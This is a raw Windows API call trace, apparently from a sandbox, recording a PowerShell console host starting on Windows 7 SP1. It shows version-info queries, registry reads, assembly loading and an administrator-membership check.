	[0833.802] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x16def0 | out: lpdwHandle=0x16def0) returned 0x94c
	[0833.803] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2e55328 | out: lpData=0x2e55328) returned 1
	[0833.804] VerQueryValueW (in: pBlock=0x2e55328, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16de68, puLen=0x16de60 | out: lplpBuffer=0x16de68*=0x2e553c4, puLen=0x16de60) returned 1
	[0833.804] VerQueryValueW (in: pBlock=0x2e55328, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x16ddd8, puLen=0x16ddd0 | out: lplpBuffer=0x16ddd8*=0x2e554a0, puLen=0x16ddd0) returned 1
	[0833.804] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0833.804] CoTaskMemAlloc (cb=0x2e) returned 0x323440
	[0833.804] lstrcpyW (in: lpString1=0x323440, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0833.805] CoTaskMemFree (pv=0x323440) 
	[0833.805] VerQueryValueW (in: pBlock=0x2e55328, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x16ddd8, puLen=0x16ddd0 | out: lplpBuffer=0x16ddd8*=0x2e554f4, puLen=0x16ddd0) returned 1
	[0833.805] lstrlenW (lpString="System.Management.Automation") returned 28
	[0833.805] CoTaskMemAlloc (cb=0x3c) returned 0x2a4b20
	[0833.805] lstrcpyW (in: lpString1=0x2a4b20, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0833.805] CoTaskMemFree (pv=0x2a4b20) 
	[0833.805] VerQueryValueW (in: pBlock=0x2e55328, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x16ddd8, puLen=0x16ddd0 | out: lplpBuffer=0x16ddd8*=0x2e55550, puLen=0x16ddd0) returned 1
	[0833.805] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0833.805] CoTaskMemAlloc (cb=0x20) returned 0x328aa0
	[0833.805] lstrcpyW (in: lpString1=0x328aa0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0833.805] CoTaskMemFree (pv=0x328aa0) 
	[0833.805] VerQueryValueW (in: pBlock=0x2e55328, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x16ddd8, puLen=0x16ddd0 | out: lplpBuffer=0x16ddd8*=0x2e55590, puLen=0x16ddd0) returned 1
	[0833.805] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0833.805] CoTaskMemAlloc (cb=0x44) returned 0x2a4b20
	[0833.805] lstrcpyW (in: lpString1=0x2a4b20, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0833.805] CoTaskMemFree (pv=0x2a4b20) 
	[0833.806] VerQueryValueW (in: pBlock=0x2e55328, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x16ddd8, puLen=0x16ddd0 | out: lplpBuffer=0x16ddd8*=0x2e555f8, puLen=0x16ddd0) returned 1
	[0833.806] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0833.806] CoTaskMemAlloc (cb=0x76) returned 0x2d0f80
	[0833.806] lstrcpyW (in: lpString1=0x2d0f80, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0833.806] CoTaskMemFree (pv=0x2d0f80) 
	[0833.806] VerQueryValueW (in: pBlock=0x2e55328, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x16ddd8, puLen=0x16ddd0 | out: lplpBuffer=0x16ddd8*=0x2e55694, puLen=0x16ddd0) returned 1
	[0833.806] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0833.806] CoTaskMemAlloc (cb=0x44) returned 0x2a4b20
	[0833.806] lstrcpyW (in: lpString1=0x2a4b20, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0833.806] CoTaskMemFree (pv=0x2a4b20) 
	[0833.806] VerQueryValueW (in: pBlock=0x2e55328, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x16ddd8, puLen=0x16ddd0 | out: lplpBuffer=0x16ddd8*=0x2e556f8, puLen=0x16ddd0) returned 1
	[0833.806] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0833.806] CoTaskMemAlloc (cb=0x58) returned 0x285620
	[0833.806] lstrcpyW (in: lpString1=0x285620, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0833.806] CoTaskMemFree (pv=0x285620) 
	[0833.806] VerQueryValueW (in: pBlock=0x2e55328, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x16ddd8, puLen=0x16ddd0 | out: lplpBuffer=0x16ddd8*=0x2e55774, puLen=0x16ddd0) returned 1
	[0833.806] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0833.806] CoTaskMemAlloc (cb=0x20) returned 0x328aa0
	[0833.806] lstrcpyW (in: lpString1=0x328aa0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0833.807] CoTaskMemFree (pv=0x328aa0) 
	[0833.809] VerQueryValueW (in: pBlock=0x2e55328, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x16ddd8, puLen=0x16ddd0 | out: lplpBuffer=0x16ddd8*=0x2e5541c, puLen=0x16ddd0) returned 1
	[0833.809] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0833.809] CoTaskMemAlloc (cb=0x66) returned 0x3277c0
	[0833.809] lstrcpyW (in: lpString1=0x3277c0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0833.809] CoTaskMemFree (pv=0x3277c0) 
	[0833.809] VerQueryValueW (in: pBlock=0x2e55328, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x16ddd8, puLen=0x16ddd0 | out: lplpBuffer=0x16ddd8*=0x0, puLen=0x16ddd0) returned 0
	[0833.809] VerQueryValueW (in: pBlock=0x2e55328, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x16ddd8, puLen=0x16ddd0 | out: lplpBuffer=0x16ddd8*=0x0, puLen=0x16ddd0) returned 0
	[0833.809] VerQueryValueW (in: pBlock=0x2e55328, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x16ddd8, puLen=0x16ddd0 | out: lplpBuffer=0x16ddd8*=0x0, puLen=0x16ddd0) returned 0
	[0833.809] VerQueryValueW (in: pBlock=0x2e55328, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16dda8, puLen=0x16dda0 | out: lplpBuffer=0x16dda8*=0x2e553c4, puLen=0x16dda0) returned 1
	[0833.809] CoTaskMemAlloc (cb=0x204) returned 0x2d40a0
	[0833.809] VerLanguageNameW (in: wLang=0x0, szLang=0x2d40a0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0833.809] CoTaskMemFree (pv=0x2d40a0) 
	[0833.809] VerQueryValueW (in: pBlock=0x2e55328, lpSubBlock="\\", lplpBuffer=0x16ddf8, puLen=0x16ddf0 | out: lplpBuffer=0x16ddf8*=0x2e55350, puLen=0x16ddf0) returned 1
	[0833.817] CoTaskMemAlloc (cb=0x104) returned 0x283a90
	[0833.817] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x283a90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0833.817] CoTaskMemFree (pv=0x283a90) 
	[0836.005] CoTaskMemAlloc (cb=0x104) returned 0x283a90
	[0836.005] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x283a90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0836.005] CoTaskMemFree (pv=0x283a90) 
	[0838.183] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16dcc8 | out: phkResult=0x16dcc8*=0x2e8) returned 0x0
	[0838.184] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x16dcb8 | out: phkResult=0x16dcb8*=0x2ec) returned 0x0
	[0838.185] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16dd48 | out: phkResult=0x16dd48*=0x2f0) returned 0x0
	[0838.188] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16dc8c, lpData=0x0, lpcbData=0x16dc88*=0x0 | out: lpType=0x16dc8c*=0x1, lpData=0x0, lpcbData=0x16dc88*=0x56) returned 0x0
	[0838.189] CoTaskMemAlloc (cb=0x5a) returned 0x327750
	[0838.189] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16dc5c, lpData=0x327750, lpcbData=0x16dc58*=0x56 | out: lpType=0x16dc5c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16dc58*=0x56) returned 0x0
	[0838.189] CoTaskMemFree (pv=0x327750) 
	[0838.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0838.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0839.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0843.834] CoTaskMemAlloc (cb=0x104) returned 0x329a80
	[0843.834] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329a80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0843.834] CoTaskMemFree (pv=0x329a80) 
	[0860.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0860.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0862.379] CoTaskMemAlloc (cb=0x104) returned 0x334d80
	[0862.379] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x334d80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0862.379] CoTaskMemFree (pv=0x334d80) 
	[0862.381] CoTaskMemAlloc (cb=0x104) returned 0x334d80
	[0862.381] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x334d80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0862.381] CoTaskMemFree (pv=0x334d80) 
	[0865.913] CoTaskMemAlloc (cb=0x104) returned 0x334eb0
	[0865.913] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x334eb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0865.913] CoTaskMemFree (pv=0x334eb0) 
	[0865.915] CoTaskMemAlloc (cb=0x104) returned 0x334eb0
	[0865.915] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x334eb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0865.915] CoTaskMemFree (pv=0x334eb0) 
	[0865.916] CoTaskMemAlloc (cb=0x104) returned 0x334eb0
	[0865.916] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x334eb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0865.916] CoTaskMemFree (pv=0x334eb0) 
	[0873.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x16d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0873.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x16d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0873.047] CoTaskMemAlloc (cb=0x104) returned 0x339800
	[0873.048] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x339800, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0873.048] CoTaskMemFree (pv=0x339800) 
	[0873.050] CoTaskMemAlloc (cb=0x104) returned 0x339800
	[0873.050] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x339800, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0873.050] CoTaskMemFree (pv=0x339800) 
	[0874.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0874.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0900.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x16d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0900.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x16d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0926.604] CoTaskMemAlloc (cb=0x104) returned 0x339a20
	[0926.604] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x339a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0926.604] CoTaskMemFree (pv=0x339a20) 
	[0930.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x16d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0930.033] SetErrorMode (uMode=0x1) returned 0x1
	[0930.034] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x16dc20 | out: lpFileInformation=0x16dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0930.034] SetErrorMode (uMode=0x1) returned 0x1
	[0960.335] CoTaskMemAlloc (cb=0x104) returned 0x339a20
	[0960.335] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x339a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0960.335] CoTaskMemFree (pv=0x339a20) 
	[0960.336] CoTaskMemAlloc (cb=0x104) returned 0x339a20
	[0960.336] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x339a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0960.336] CoTaskMemFree (pv=0x339a20) 
	[0960.337] CoTaskMemAlloc (cb=0x104) returned 0x339a20
	[0960.337] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x339a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0960.337] CoTaskMemFree (pv=0x339a20) 
	[0960.338] CoCreateGuid (in: pguid=0x16dfe8 | out: pguid=0x16dfe8*(Data1=0x415c322f, Data2=0xf7e6, Data3=0x4db9, Data4=([0]=0x93, [1]=0x72, [2]=0xd3, [3]=0xda, [4]=0xcf, [5]=0x35, [6]=0x6b, [7]=0xb2))) returned 0x0
	[0960.341] CoTaskMemAlloc (cb=0x104) returned 0x339a20
	[0960.341] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x339a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0960.341] CoTaskMemFree (pv=0x339a20) 
	[0960.343] CoTaskMemAlloc (cb=0x104) returned 0x339a20
	[0960.343] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x339a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0960.343] CoTaskMemFree (pv=0x339a20) 
	[0960.345] CoTaskMemAlloc (cb=0x104) returned 0x339a20
	[0960.345] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x339a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0960.345] CoTaskMemFree (pv=0x339a20) 
	[0960.359] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0960.963] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x16dc90 | out: lpConsoleScreenBufferInfo=0x16dc90) returned 1
	[0960.982] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0960.983] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x16dc90 | out: lpConsoleScreenBufferInfo=0x16dc90) returned 1
	[0960.984] GetVersionExW (in: lpVersionInformation=0x16dc20*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16dc20*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0960.986] GetCurrentProcess () returned 0xffffffffffffffff
	[0960.987] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x16dcb8 | out: TokenHandle=0x16dcb8*=0x2f4) returned 1
	[0960.990] GetTokenInformation (in: TokenHandle=0x2f4, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16dbd8 | out: TokenInformation=0x0, ReturnLength=0x16dbd8) returned 0
	[0960.991] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x297280
	[0960.991] GetTokenInformation (in: TokenHandle=0x2f4, TokenInformationClass=0x8, TokenInformation=0x297280, TokenInformationLength=0x4, ReturnLength=0x16dbd8 | out: TokenInformation=0x297280, ReturnLength=0x16dbd8) returned 1
	[0960.993] DuplicateTokenEx (in: hExistingToken=0x2f4, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x16dd38 | out: phNewToken=0x16dd38*=0x190) returned 1
	[0960.993] GetTokenInformation (in: TokenHandle=0x2f4, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16dbd8 | out: TokenInformation=0x0, ReturnLength=0x16dbd8) returned 0
	[0960.993] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2972b0
	[0960.993] GetTokenInformation (in: TokenHandle=0x2f4, TokenInformationClass=0x8, TokenInformation=0x2972b0, TokenInformationLength=0x4, ReturnLength=0x16dbd8 | out: TokenInformation=0x2972b0, ReturnLength=0x16dbd8) returned 1
	[0960.994] CheckTokenMembership (in: TokenHandle=0x190, SidToCheck=0x2e7bc60*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x16dd48 | out: IsMember=0x16dd48) returned 1
	[0960.994] CloseHandle (hObject=0x190) returned 1
	[0960.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0960.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0960.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0960.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.446] CoTaskMemAlloc (cb=0x804) returned 0x34f4f0
	[0961.446] GetConsoleTitleW (in: lpConsoleTitle=0x34f4f0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0961.447] CoTaskMemFree (pv=0x34f4f0) 
	[0961.460] CoTaskMemAlloc (cb=0x804) returned 0x1b955080
	[0961.460] GetConsoleTitleW (in: lpConsoleTitle=0x1b955080, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0961.461] CoTaskMemFree (pv=0x1b955080) 
	[0961.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.463] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0962.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
